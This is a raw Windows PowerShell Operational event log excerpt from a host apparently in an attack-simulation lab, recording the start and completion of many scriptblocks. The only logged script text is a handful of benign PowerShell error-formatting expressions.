Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477895
Keywords=None
Message=Started invocation of ScriptBlock ID: 03110519-7d37-44ee-b60c-60479c254ac7
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477894
Keywords=None
Message=Started invocation of ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477893
Keywords=None
Message=Started invocation of ScriptBlock ID: bb618730-79f7-4207-874b-cd87502b4b74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477892
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b8d9ce5-9bbc-4943-9d8c-87bf66498064
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477891
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b8d9ce5-9bbc-4943-9d8c-87bf66498064
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477890
Keywords=None
Message=Completed invocation of ScriptBlock ID: fca6f55d-01b7-4640-b722-64c5883997ff
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477889
Keywords=None
Message=Started invocation of ScriptBlock ID: fca6f55d-01b7-4640-b722-64c5883997ff
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477888
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2e24529-583e-4e45-a6c6-d8bb6f9c9c5b
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477887
Keywords=None
Message=Started invocation of ScriptBlock ID: b2e24529-583e-4e45-a6c6-d8bb6f9c9c5b
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477886
Keywords=None
Message=Completed invocation of ScriptBlock ID: 437e352b-a8b1-47d5-a6f3-e37832de99ec
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477885
Keywords=None
Message=Started invocation of ScriptBlock ID: 437e352b-a8b1-47d5-a6f3-e37832de99ec
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477884
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4256f37c-6fc7-4ec6-8ce4-c6e1b9a23c26
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477883
Keywords=None
Message=Started invocation of ScriptBlock ID: 4256f37c-6fc7-4ec6-8ce4-c6e1b9a23c26
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477882
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca42d83b-c737-443e-947c-9e33d13a624b
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477881
Keywords=None
Message=Started invocation of ScriptBlock ID: ca42d83b-c737-443e-947c-9e33d13a624b
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477880
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2ddd0871-8a1e-4cca-9a45-2ea405c2ea02
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477879
Keywords=None
Message=Started invocation of ScriptBlock ID: 2ddd0871-8a1e-4cca-9a45-2ea405c2ea02
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477878
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e9f8fc0-121b-4df4-a619-0c37abe4be0e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477877
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e9f8fc0-121b-4df4-a619-0c37abe4be0e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477876
Keywords=None
Message=Completed invocation of ScriptBlock ID: d791fea7-09eb-416a-ad82-63caf5a297c5
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477875
Keywords=None
Message=Started invocation of ScriptBlock ID: d791fea7-09eb-416a-ad82-63caf5a297c5
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477874
Keywords=None
Message=Completed invocation of ScriptBlock ID: 11876235-9444-47d1-adee-aa6ed773c2f6
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477873
Keywords=None
Message=Started invocation of ScriptBlock ID: 11876235-9444-47d1-adee-aa6ed773c2f6
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477872
Keywords=None
Message=Completed invocation of ScriptBlock ID: da3aeb84-aa80-4dd3-b464-77996b32fc98
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477871
Keywords=None
Message=Started invocation of ScriptBlock ID: da3aeb84-aa80-4dd3-b464-77996b32fc98
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477870
Keywords=None
Message=Completed invocation of ScriptBlock ID: dbd34688-a2ba-4dd0-8df7-e07409089d67
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477869
Keywords=None
Message=Started invocation of ScriptBlock ID: dbd34688-a2ba-4dd0-8df7-e07409089d67
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477868
Keywords=None
Message=Completed invocation of ScriptBlock ID: c7ce3506-8e75-458a-8461-e373b2909f74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477867
Keywords=None
Message=Started invocation of ScriptBlock ID: c7ce3506-8e75-458a-8461-e373b2909f74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477866
Keywords=None
Message=Completed invocation of ScriptBlock ID: d4e10671-cc8e-479b-bd36-a97623313e52
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477865
Keywords=None
Message=Started invocation of ScriptBlock ID: d4e10671-cc8e-479b-bd36-a97623313e52
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477864
Keywords=None
Message=Completed invocation of ScriptBlock ID: e7bfe319-e7ee-4a4f-a72f-df26a1b8967c
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477863
Keywords=None
Message=Started invocation of ScriptBlock ID: e7bfe319-e7ee-4a4f-a72f-df26a1b8967c
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477862
Keywords=None
Message=Completed invocation of ScriptBlock ID: b75f5b09-bdbd-419c-8a30-a1d00dcb6e01
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477861
Keywords=None
Message=Started invocation of ScriptBlock ID: b75f5b09-bdbd-419c-8a30-a1d00dcb6e01
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477860
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4c8c359b-7462-4a65-b349-a048084fd407
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477859
Keywords=None
Message=Started invocation of ScriptBlock ID: 4c8c359b-7462-4a65-b349-a048084fd407
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477858
Keywords=None
Message=Completed invocation of ScriptBlock ID: bb618730-79f7-4207-874b-cd87502b4b74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477857
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477856
Keywords=None
Message=Started invocation of ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477855
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Path:
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477854
Keywords=None
Message=Completed invocation of ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477853
Keywords=None
Message=Started invocation of ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477852
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Path:
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477851
Keywords=None
Message=Completed invocation of ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477850
Keywords=None
Message=Completed invocation of ScriptBlock ID: 03110519-7d37-44ee-b60c-60479c254ac7
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477849
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477848
Keywords=None
Message=Started invocation of ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477847
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Path:
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477846
Keywords=None
Message=Started invocation of ScriptBlock ID: 03110519-7d37-44ee-b60c-60479c254ac7
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477845
Keywords=None
Message=Started invocation of ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477844
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Path:
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477843
Keywords=None
Message=Started invocation of ScriptBlock ID: bb618730-79f7-4207-874b-cd87502b4b74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477842
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b8d9ce5-9bbc-4943-9d8c-87bf66498064
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477841
Keywords=None
